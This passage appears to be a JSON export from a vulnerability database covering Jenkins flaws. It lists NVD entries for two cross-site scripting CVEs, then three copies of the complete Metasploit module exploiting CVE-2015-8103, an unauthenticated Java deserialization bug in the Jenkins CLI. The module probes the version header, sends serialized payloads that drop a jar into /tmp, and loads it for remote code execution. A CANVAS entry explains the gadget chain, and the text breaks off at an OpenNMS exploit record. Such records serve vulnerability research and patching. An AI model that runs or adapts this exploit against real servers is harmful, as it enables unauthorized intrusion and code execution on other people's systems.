"2019-05-29T18:14:44", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in Jenkins before 1.640 and LTS before 1.625.2 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors related to workspaces and archived artifacts.", "modified": "2016-06-14T00:14:00", "id": "CVE-2015-7536", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7536", "published": "2016-02-03T18:59:00", "title": "CVE-2015-7536", "type": "cve", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:14:43", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in the slave overview page in Jenkins before 1.638 and LTS before 1.625.2 allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via the slave offline status message.", "modified": "2016-06-14T00:15:00", "id": "CVE-2015-5326", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5326", "published": "2015-11-25T20:59:00", "title": "CVE-2015-5326", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-04T09:15:13", "bulletinFamily": "exploit", "description": "Jenkins CLI RMI Java Deserialization Vulnerability. CVE-2015-8103. Remote exploit for java platform", "modified": "2015-12-15T00:00:00", "published": "2015-12-15T00:00:00", "id": "EDB-ID:38983", "href": "https://www.exploit-db.com/exploits/38983/", "type": "exploitdb", "title": "Jenkins CLI RMI Java Deserialization Vulnerability", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on\r\n the Jenkins master, which allows remote arbitrary code execution. Authentication is not\r\n required to exploit this vulnerability.\r\n },\r\n 'Author' =>\r\n [\r\n 'Christopher Frohoff', # Vulnerability discovery\r\n 'Steve Breen', # Public Exploit\r\n 'Dev Mohanty', # Metasploit module\r\n 'Louis Sato', # Metasploit\r\n 'William Vu', # Metasploit\r\n 'juan vazquez', # Metasploit\r\n 'Wei Chen' # Metasploit\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2015-8103'],\r\n ['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],\r\n ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],\r\n ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],\r\n ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']\r\n ],\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'Jenkins 1.637', {} ]\r\n ],\r\n 'DisclosureDate' => 'Nov 18 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']),\r\n OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),\r\n Opt::RPORT('8080')\r\n ], self.class)\r\n end\r\n\r\n def exploit\r\n unless vulnerable?\r\n fail_with(Failure::Unknown, \"#{peer} - Jenkins is not vulnerable, aborting...\")\r\n end\r\n invoke_remote_method(set_payload)\r\n invoke_remote_method(class_load_payload)\r\n end\r\n\r\n\r\n # This is from the HttpClient mixin. But since this module isn't actually exploiting\r\n # HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion &\r\n # conflicts). We do need #target_uri and normlaize_uri to properly normalize the path though.\r\n\r\n def target_uri\r\n begin\r\n # In case TARGETURI is empty, at least we default to '/'\r\n u = datastore['TARGETURI']\r\n u = \"/\" if u.nil? or u.empty?\r\n URI(u)\r\n rescue ::URI::InvalidURIError\r\n print_error \"Invalid URI: #{datastore['TARGETURI'].inspect}\"\r\n raise Msf::OptionValidateError.new(['TARGETURI'])\r\n end\r\n end\r\n\r\n def normalize_uri(*strs)\r\n new_str = strs * \"/\"\r\n\r\n new_str = new_str.gsub!(\"//\", \"/\") while new_str.index(\"//\")\r\n\r\n # Makes sure there's a starting slash\r\n unless new_str[0,1] == '/'\r\n new_str = '/' + new_str\r\n end\r\n\r\n new_str\r\n end\r\n\r\n def check\r\n result = Exploit::CheckCode::Safe\r\n\r\n begin\r\n if vulnerable?\r\n result = Exploit::CheckCode::Vulnerable\r\n end\r\n rescue Msf::Exploit::Failed => e\r\n vprint_error(e.message)\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n result\r\n end\r\n\r\n def vulnerable?\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path)\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'The connection timed out.')\r\n end\r\n\r\n http_headers = res.headers\r\n\r\n unless http_headers['X-Jenkins-CLI-Port']\r\n vprint_error('The server does not have the CLI port that is needed for exploitation.')\r\n return false\r\n end\r\n\r\n if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637\r\n @jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i\r\n return true\r\n end\r\n\r\n false\r\n end\r\n\r\n # Connects to the server, creates a request, sends the request,\r\n # reads the response\r\n #\r\n # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.\r\n #\r\n def send_request_cgi(opts={}, timeout = 20)\r\n if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0\r\n actual_timeout = datastore['HttpClientTimeout']\r\n else\r\n actual_timeout = opts[:timeout] || timeout\r\n end\r\n\r\n begin\r\n c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])\r\n c.connect\r\n r = c.request_cgi(opts)\r\n c.send_recv(r, actual_timeout)\r\n rescue ::Errno::EPIPE, ::Timeout::Error\r\n nil\r\n end\r\n end\r\n\r\n def invoke_remote_method(serialized_java_stream)\r\n begin\r\n socket = connect(true, {'RPORT' => @jenkins_cli_port})\r\n\r\n print_status 'Sending headers...'\r\n socket.put(read_bin_file('serialized_jenkins_header'))\r\n\r\n vprint_status(socket.recv(1024))\r\n vprint_status(socket.recv(1024))\r\n\r\n encoded_payload0 = read_bin_file('serialized_payload_header')\r\n encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)\r\n encoded_payload2 = read_bin_file('serialized_payload_footer')\r\n\r\n encoded_payload = \"#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}\"\r\n print_status \"Sending payload length: #{encoded_payload.length}\"\r\n socket.put(encoded_payload)\r\n ensure\r\n disconnect(socket)\r\n end\r\n\r\n end\r\n\r\n def print_status(msg='')\r\n super(\"#{rhost}:#{rport} - #{msg}\")\r\n end\r\n\r\n #\r\n # Serialized stream generated with:\r\n # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java\r\n #\r\n def set_payload\r\n stream = Rex::Java::Serialization::Model::Stream.new\r\n\r\n handle = File.new(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", 'serialized_file_writer' ), 'rb')\r\n decoded = stream.decode(handle)\r\n handle.close\r\n\r\n inject_payload_into_stream(decoded).encode\r\n end\r\n\r\n #\r\n # Serialized stream generated with:\r\n # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java\r\n #\r\n def class_load_payload\r\n stream = Rex::Java::Serialization::Model::Stream.new\r\n handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')\r\n decoded = stream.decode(handle)\r\n handle.close\r\n inject_class_loader_into_stream(decoded).encode\r\n end\r\n\r\n def inject_class_loader_into_stream(decoded)\r\n file_name_utf8 = get_array_chain(decoded)\r\n .values[2]\r\n .class_data[0]\r\n .values[1]\r\n .values[0]\r\n .values[0]\r\n .class_data[3]\r\n file_name_utf8.contents = get_random_file_name\r\n file_name_utf8.length = file_name_utf8.contents.length\r\n class_name_utf8 = get_array_chain(decoded)\r\n .values[4]\r\n .class_data[0]\r\n .values[0]\r\n class_name_utf8.contents = 'metasploit.Payload'\r\n class_name_utf8.length = class_name_utf8.contents.length\r\n decoded\r\n end\r\n\r\n def get_random_file_name\r\n @random_file_name ||= \"#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], \"#{rand_text_alpha(4 + rand(4))}.jar\")}\"\r\n end\r\n\r\n def inject_payload_into_stream(decoded)\r\n byte_array = get_array_chain(decoded)\r\n .values[2]\r\n .class_data\r\n .last\r\n byte_array.values = payload.encoded.bytes\r\n file_name_utf8 = decoded.references[44].class_data[0]\r\n rnd_fname = get_random_file_name\r\n register_file_for_cleanup(rnd_fname)\r\n file_name_utf8.contents = rnd_fname\r\n file_name_utf8.length = file_name_utf8.contents.length\r\n decoded\r\n end\r\n\r\n def get_array_chain(decoded)\r\n object = decoded.contents[0]\r\n lazy_map = object.class_data[1].class_data[0]\r\n chained_transformer = lazy_map.class_data[0]\r\n chained_transformer.class_data[0]\r\n end\r\n\r\n def read_bin_file(bin_file_path)\r\n data = ''\r\n\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", bin_file_path ), 'rb') do |f|\r\n data = f.read\r\n end\r\n\r\n data\r\n end\r\n\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38983/"}], "packetstorm": [{"lastseen": "2016-12-05T22:18:20", "bulletinFamily": "exploit", "description": "", "modified": "2015-12-14T00:00:00", "published": "2015-12-14T00:00:00", "href": "https://packetstormsecurity.com/files/134805/Jenkins-CLI-RMI-Java-Deserialization.html", "id": "PACKETSTORM:134805", "type": "packetstorm", "title": "Jenkins CLI RMI Java Deserialization", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on \nthe Jenkins master, which allows remote arbitrary code execution. Authentication is not \nrequired to exploit this vulnerability. \n}, \n'Author' => \n[ \n'Christopher Frohoff', # Vulnerability discovery \n'Steve Breen', # Public Exploit \n'Dev Mohanty', # Metasploit module \n'Louis Sato', # Metasploit \n'William Vu', # Metasploit \n'juan vazquez', # Metasploit \n'Wei Chen' # Metasploit \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2015-8103'], \n['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'], \n['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'], \n['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'], \n['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11'] \n], \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'Jenkins 1.637', {} ] \n], \n'DisclosureDate' => 'Nov 18 2015', \n'DefaultTarget' => 0)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']), \nOptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']), \nOpt::RPORT('8080') \n], self.class) \nend \n \ndef exploit \nunless vulnerable? \nfail_with(Failure::Unknown, \"#{peer} - Jenkins is not vulnerable, aborting...\") \nend \ninvoke_remote_method(set_payload) \ninvoke_remote_method(class_load_payload) \nend \n \n \n# This is from the HttpClient mixin. But since this module isn't actually exploiting \n# HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion & \n# conflicts). We do need #target_uri and normlaize_uri to properly normalize the path though. \n \ndef target_uri \nbegin \n# In case TARGETURI is empty, at least we default to '/' \nu = datastore['TARGETURI'] \nu = \"/\" if u.nil? or u.empty? \nURI(u) \nrescue ::URI::InvalidURIError \nprint_error \"Invalid URI: #{datastore['TARGETURI'].inspect}\" \nraise Msf::OptionValidateError.new(['TARGETURI']) \nend \nend \n \ndef normalize_uri(*strs) \nnew_str = strs * \"/\" \n \nnew_str = new_str.gsub!(\"//\", \"/\") while new_str.index(\"//\") \n \n# Makes sure there's a starting slash \nunless new_str[0,1] == '/' \nnew_str = '/' + new_str \nend \n \nnew_str \nend \n \ndef check \nresult = Exploit::CheckCode::Safe \n \nbegin \nif vulnerable? \nresult = Exploit::CheckCode::Vulnerable \nend \nrescue Msf::Exploit::Failed => e \nvprint_error(e.message) \nreturn Exploit::CheckCode::Unknown \nend \n \nresult \nend \n \ndef vulnerable? \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path) \n}) \n \nunless res \nfail_with(Failure::Unknown, 'The connection timed out.') \nend \n \nhttp_headers = res.headers \n \nunless http_headers['X-Jenkins-CLI-Port'] \nvprint_error('The server does not have the CLI port that is needed for exploitation.') \nreturn false \nend \n \nif http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637 \n@jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i \nreturn true \nend \n \nfalse \nend \n \n# Connects to the server, creates a request, sends the request, \n# reads the response \n# \n# Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi. \n# \ndef send_request_cgi(opts={}, timeout = 20) \nif datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0 \nactual_timeout = datastore['HttpClientTimeout'] \nelse \nactual_timeout = opts[:timeout] || timeout \nend \n \nbegin \nc = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT']) \nc.connect \nr = c.request_cgi(opts) \nc.send_recv(r, actual_timeout) \nrescue ::Errno::EPIPE, ::Timeout::Error \nnil \nend \nend \n \ndef invoke_remote_method(serialized_java_stream) \nbegin \nsocket = connect(true, {'RPORT' => @jenkins_cli_port}) \n \nprint_status 'Sending headers...' \nsocket.put(read_bin_file('serialized_jenkins_header')) \n \nvprint_status(socket.recv(1024)) \nvprint_status(socket.recv(1024)) \n \nencoded_payload0 = read_bin_file('serialized_payload_header') \nencoded_payload1 = Rex::Text.encode_base64(serialized_java_stream) \nencoded_payload2 = read_bin_file('serialized_payload_footer') \n \nencoded_payload = \"#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}\" \nprint_status \"Sending payload length: #{encoded_payload.length}\" \nsocket.put(encoded_payload) \nensure \ndisconnect(socket) \nend \n \nend \n \ndef print_status(msg='') \nsuper(\"#{rhost}:#{rport} - #{msg}\") \nend \n \n# \n# Serialized stream generated with: \n# https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java \n# \ndef set_payload \nstream = Rex::Java::Serialization::Model::Stream.new \n \nhandle = File.new(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", 'serialized_file_writer' ), 'rb') \ndecoded = stream.decode(handle) \nhandle.close \n \ninject_payload_into_stream(decoded).encode \nend \n \n# \n# Serialized stream generated with: \n# https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java \n# \ndef class_load_payload \nstream = Rex::Java::Serialization::Model::Stream.new \nhandle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb') \ndecoded = stream.decode(handle) \nhandle.close \ninject_class_loader_into_stream(decoded).encode \nend \n \ndef inject_class_loader_into_stream(decoded) \nfile_name_utf8 = get_array_chain(decoded) \n.values[2] \n.class_data[0] \n.values[1] \n.values[0] \n.values[0] \n.class_data[3] \nfile_name_utf8.contents = get_random_file_name \nfile_name_utf8.length = file_name_utf8.contents.length \nclass_name_utf8 = get_array_chain(decoded) \n.values[4] \n.class_data[0] \n.values[0] \nclass_name_utf8.contents = 'metasploit.Payload' \nclass_name_utf8.length = class_name_utf8.contents.length \ndecoded \nend \n \ndef get_random_file_name \n@random_file_name ||= \"#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], \"#{rand_text_alpha(4 + rand(4))}.jar\")}\" \nend \n \ndef inject_payload_into_stream(decoded) \nbyte_array = get_array_chain(decoded) \n.values[2] \n.class_data \n.last \nbyte_array.values = payload.encoded.bytes \nfile_name_utf8 = decoded.references[44].class_data[0] \nrnd_fname = get_random_file_name \nregister_file_for_cleanup(rnd_fname) \nfile_name_utf8.contents = rnd_fname \nfile_name_utf8.length = file_name_utf8.contents.length \ndecoded \nend \n \ndef get_array_chain(decoded) \nobject = decoded.contents[0] \nlazy_map = object.class_data[1].class_data[0] \nchained_transformer = lazy_map.class_data[0] \nchained_transformer.class_data[0] \nend \n \ndef read_bin_file(bin_file_path) \ndata = '' \n \nFile.open(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", bin_file_path ), 'rb') do |f| \ndata = f.read \nend \n \ndata \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134805/jenkins_java_deserialize.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2019-05-29T19:48:26", "bulletinFamily": "exploit", "description": "**Name**| jenkins_cli_deserialization \n---|--- \n**CVE**| CVE-2015-8103 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| jenkins_cli_deserialization \n**Notes**| CVE Name: CVE-2015-8103 \nVENDOR: Jenkins \nNOTES: \nIMPORTANT NOTE: Any instance of this application running Apache Commons Collections version prior to 3.0 WILL NOT WORK. \n \n \nJenkins has a remote command line interface console. It is often unauthenticated. It communicates \nwith a client by exchanging serialized Java Objects. Apache Commons pre-3.2.2 allows users to \nserialize transformers on collection values. Of importance to us is the InvokerTransfomer, which \nis capable of invoking Java methods. We are able to run these transformers by adding them to an \nannotation map whose members are acccessed. The right chain of method invocations leads to arbitrary \ncode execution. \n \nNOTE: By default, Jenkins starts its management web application on 0.0.0.0:8080. \nFor this module to work, both the web interface specified above *and* the CLI port specified by the \nX-Jenkins-CLI-Port element in the HTTP response headers from said web interface need to be \naccessible by the CANVAS host. \n \nVersion support: \n> Windows 7 Ultimate SP1 x86 \n\\- 1.598 on Java SE 6 / 7 / 8 \n\\- 1.637 on Java SE 6 / 7 / 8 \n> Ubuntu Linux 14.04.3 - x86 \n\\- 1.598 on Java SE 6 / 7 / 8 \n\\- 1.600 on Java SE 6 / 7 / 8 \n\\- 1.637 on Java SE 6 / 7 / 8 \n \nRepeatability: Infinite \nReferences: ['http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11'] \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8103 \n\n", "modified": "2015-11-25T20:59:00", "published": "2015-11-25T20:59:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/jenkins_cli_deserialization", "id": "JENKINS_CLI_DESERIALIZATION", "title": "Immunity Canvas: JENKINS_CLI_DESERIALIZATION", "type": "canvas", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-21T15:32:29", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on the Jenkins master, which allows remote arbitrary code execution. Authentication is not required to exploit this vulnerability.", "modified": "2015-12-15T00:00:00", "published": "2015-12-15T00:00:00", "id": "1337DAY-ID-24727", "href": "https://0day.today/exploit/description/24727", "type": "zdt", "title": "Jenkins CLI RMI Java Deserialization Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Jenkins CLI RMI Java Deserialization Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on\r\n the Jenkins master, which allows remote arbitrary code execution. Authentication is not\r\n required to exploit this vulnerability.\r\n },\r\n 'Author' =>\r\n [\r\n 'Christopher Frohoff', # Vulnerability discovery\r\n 'Steve Breen', # Public Exploit\r\n 'Dev Mohanty', # Metasploit module\r\n 'Louis Sato', # Metasploit\r\n 'William Vu', # Metasploit\r\n 'juan vazquez', # Metasploit\r\n 'Wei Chen' # Metasploit\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2015-8103'],\r\n ['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],\r\n ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],\r\n ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],\r\n ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']\r\n ],\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'Jenkins 1.637', {} ]\r\n ],\r\n 'DisclosureDate' => 'Nov 18 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'The base path to Jenkins in order to find X-Jenkins-CLI-Port', '/']),\r\n OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),\r\n Opt::RPORT('8080')\r\n ], self.class)\r\n end\r\n\r\n def exploit\r\n unless vulnerable?\r\n fail_with(Failure::Unknown, \"#{peer} - Jenkins is not vulnerable, aborting...\")\r\n end\r\n invoke_remote_method(set_payload)\r\n invoke_remote_method(class_load_payload)\r\n end\r\n\r\n\r\n # This is from the HttpClient mixin. But since this module isn't actually exploiting\r\n # HTTP, the mixin isn't used in order to favor the Tcp mixin (to avoid datastore confusion &\r\n # conflicts). We do need #target_uri and normlaize_uri to properly normalize the path though.\r\n\r\n def target_uri\r\n begin\r\n # In case TARGETURI is empty, at least we default to '/'\r\n u = datastore['TARGETURI']\r\n u = \"/\" if u.nil? or u.empty?\r\n URI(u)\r\n rescue ::URI::InvalidURIError\r\n print_error \"Invalid URI: #{datastore['TARGETURI'].inspect}\"\r\n raise Msf::OptionValidateError.new(['TARGETURI'])\r\n end\r\n end\r\n\r\n def normalize_uri(*strs)\r\n new_str = strs * \"/\"\r\n\r\n new_str = new_str.gsub!(\"//\", \"/\") while new_str.index(\"//\")\r\n\r\n # Makes sure there's a starting slash\r\n unless new_str[0,1] == '/'\r\n new_str = '/' + new_str\r\n end\r\n\r\n new_str\r\n end\r\n\r\n def check\r\n result = Exploit::CheckCode::Safe\r\n\r\n begin\r\n if vulnerable?\r\n result = Exploit::CheckCode::Vulnerable\r\n end\r\n rescue Msf::Exploit::Failed => e\r\n vprint_error(e.message)\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n result\r\n end\r\n\r\n def vulnerable?\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path)\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'The connection timed out.')\r\n end\r\n\r\n http_headers = res.headers\r\n\r\n unless http_headers['X-Jenkins-CLI-Port']\r\n vprint_error('The server does not have the CLI port that is needed for exploitation.')\r\n return false\r\n end\r\n\r\n if http_headers['X-Jenkins'] && http_headers['X-Jenkins'].to_f <= 1.637\r\n @jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i\r\n return true\r\n end\r\n\r\n false\r\n end\r\n\r\n # Connects to the server, creates a request, sends the request,\r\n # reads the response\r\n #\r\n # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.\r\n #\r\n def send_request_cgi(opts={}, timeout = 20)\r\n if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0\r\n actual_timeout = datastore['HttpClientTimeout']\r\n else\r\n actual_timeout = opts[:timeout] || timeout\r\n end\r\n\r\n begin\r\n c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])\r\n c.connect\r\n r = c.request_cgi(opts)\r\n c.send_recv(r, actual_timeout)\r\n rescue ::Errno::EPIPE, ::Timeout::Error\r\n nil\r\n end\r\n end\r\n\r\n def invoke_remote_method(serialized_java_stream)\r\n begin\r\n socket = connect(true, {'RPORT' => @jenkins_cli_port})\r\n\r\n print_status 'Sending headers...'\r\n socket.put(read_bin_file('serialized_jenkins_header'))\r\n\r\n vprint_status(socket.recv(1024))\r\n vprint_status(socket.recv(1024))\r\n\r\n encoded_payload0 = read_bin_file('serialized_payload_header')\r\n encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)\r\n encoded_payload2 = read_bin_file('serialized_payload_footer')\r\n\r\n encoded_payload = \"#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}\"\r\n print_status \"Sending payload length: #{encoded_payload.length}\"\r\n socket.put(encoded_payload)\r\n ensure\r\n disconnect(socket)\r\n end\r\n\r\n end\r\n\r\n def print_status(msg='')\r\n super(\"#{rhost}:#{rport} - #{msg}\")\r\n end\r\n\r\n #\r\n # Serialized stream generated with:\r\n # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java\r\n #\r\n def set_payload\r\n stream = Rex::Java::Serialization::Model::Stream.new\r\n\r\n handle = File.new(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", 'serialized_file_writer' ), 'rb')\r\n decoded = stream.decode(handle)\r\n handle.close\r\n\r\n inject_payload_into_stream(decoded).encode\r\n end\r\n\r\n #\r\n # Serialized stream generated with:\r\n # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java\r\n #\r\n def class_load_payload\r\n stream = Rex::Java::Serialization::Model::Stream.new\r\n handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')\r\n decoded = stream.decode(handle)\r\n handle.close\r\n inject_class_loader_into_stream(decoded).encode\r\n end\r\n\r\n def inject_class_loader_into_stream(decoded)\r\n file_name_utf8 = get_array_chain(decoded)\r\n .values[2]\r\n .class_data[0]\r\n .values[1]\r\n .values[0]\r\n .values[0]\r\n .class_data[3]\r\n file_name_utf8.contents = get_random_file_name\r\n file_name_utf8.length = file_name_utf8.contents.length\r\n class_name_utf8 = get_array_chain(decoded)\r\n .values[4]\r\n .class_data[0]\r\n .values[0]\r\n class_name_utf8.contents = 'metasploit.Payload'\r\n class_name_utf8.length = class_name_utf8.contents.length\r\n decoded\r\n end\r\n\r\n def get_random_file_name\r\n @random_file_name ||= \"#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], \"#{rand_text_alpha(4 + rand(4))}.jar\")}\"\r\n end\r\n\r\n def inject_payload_into_stream(decoded)\r\n byte_array = get_array_chain(decoded)\r\n .values[2]\r\n .class_data\r\n .last\r\n byte_array.values = payload.encoded.bytes\r\n file_name_utf8 = decoded.references[44].class_data[0]\r\n rnd_fname = get_random_file_name\r\n register_file_for_cleanup(rnd_fname)\r\n file_name_utf8.contents = rnd_fname\r\n file_name_utf8.length = file_name_utf8.contents.length\r\n decoded\r\n end\r\n\r\n def get_array_chain(decoded)\r\n object = decoded.contents[0]\r\n lazy_map = object.class_data[1].class_data[0]\r\n chained_transformer = lazy_map.class_data[0]\r\n chained_transformer.class_data[0]\r\n end\r\n\r\n def read_bin_file(bin_file_path)\r\n data = ''\r\n\r\n File.open(File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2015-8103\", bin_file_path ), 'rb') do |f|\r\n data = f.read\r\n end\r\n\r\n data\r\n end\r\n\r\nend\n\n# 0day.today [2018-02-21] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24727"}], "metasploit": [{"lastseen": "2019-12-05T07:11:52", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the OpenNMS Java object which allows an unauthenticated attacker to run arbitrary code against the system.\n", "modified": "2018-07-12T22:34:52", "published": "2016-02-09T17:27:39", "id": "MSF:EXPLOIT/LINUX/MISC/OPENNMS_JAVA_SERIALIZE", "href": "", "type": "metasploit", "title": "OpenNMS Java Object Unserialization Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# 